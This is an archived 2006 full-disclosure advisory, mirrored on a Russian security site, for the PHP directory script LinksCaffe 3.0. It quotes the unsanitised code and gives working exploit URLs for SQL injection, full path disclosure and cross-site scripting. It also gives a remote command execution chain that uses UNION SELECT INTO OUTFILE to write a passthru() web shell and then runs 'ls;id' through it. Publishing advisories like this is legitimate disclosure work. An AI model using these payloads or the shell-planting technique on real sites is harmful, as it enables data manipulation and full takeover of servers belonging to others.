Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SA21207] SD Studio CMS SQL Injection Vulnerabilities

  [SA20852] AutoVue SolidModel Professional Buffer Overflow Vulnerability

  [Full-disclosure] TP-Book <= 1.00 Cross Site Scripting Vulnerabilities

  [Full-disclosure] Professional Home Page Tools Login Script Cross Site Scripting Vulnerabilities

From:simo64_(at)_gmail.com <simo64_(at)_gmail.com>
Date:26 июля 2006 г.
Subject:LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties

Produce       : LinksCaffe 3.0
Website       : http://gonafish.com/
Impact        : manupulation of data / system access
Discovered by : Simo64 - Moroccan Security Team

[+] SQL injection
******************

 [1]Vulnerable code in line 223 in links.php

       code :

       $rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());

       $offset and $limit vars are not sanitized before to be used to conducte sql injection attacks

       Exploit :

       http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]
       http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]
 
 [2]   Vulnerable code in line 516 in links.php
 
 code :

       if (!$newdays)
       {
       $newdays=$daysnew;
       }
       else
       {
       $newdays=$newdays;
       }
       
       $rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());
                       
       Exploit :
       http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]
       
       
 [3]   Vulnerable code in line 516 in links.php
 
 code :
 
 if ($action=="deadlink")
       {
       ........
       $rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());
       while($row = mysql_fetch_array($rime)) {
       extract($row);
       echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name</a><br>$link_desc<br><
/font></li>";
       echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input type = 'hidden' name = 'cat_id' value='$cat_id'><input type = 'hidden' name = 'link_name' value='$link_name'>
       <input type = 'hidden' name = 'link_url' value='$link_url'><input type = 'hidden' name = 'link_desc' value='$link_desc'><input type = 'hidden' name = 'link_email' value='$link_email'><br><input type = 'submit' value = 'Dead Link'>";
       }
       
       $link_id var are not sanitized before to be used to conducte sql injection attacks
       
       Exploit :
       
       http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]
       
[+] FullPath disclosure :

PoC :

       http://localhost/linkscaffe/links.php?action=new&newdays=-
1+UNION+SELECT+123456/*
       
       Result :
       
       Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540

       Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549

       Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554
       
[+] Remote Command Execution
*****************************
       
if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!!

Exploit :
       
http://localhost/linkscaffe/links.php?action=deadlink&link_id=-
1+UNION+SELECT+0,0,0,0,
'<?passthru(\$_GET[\'cmd\']);?>',0,0,0,
0,0,0,0,0,0,
0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.
php'/*
       
after we can exec cmds
       
http://localhost/linkscaffe/pipo.php?cmd=ls;id



[+] Cross Site Scripting
*************************

$tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks
$newdays var in links.php is not sanitized before to be used to conducte xss attacks
$tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not sanitized before to be used to conducte xss attacks

PoC :

http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+

http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]

http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]



Contact : [email protected]

greetz to all friends !

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород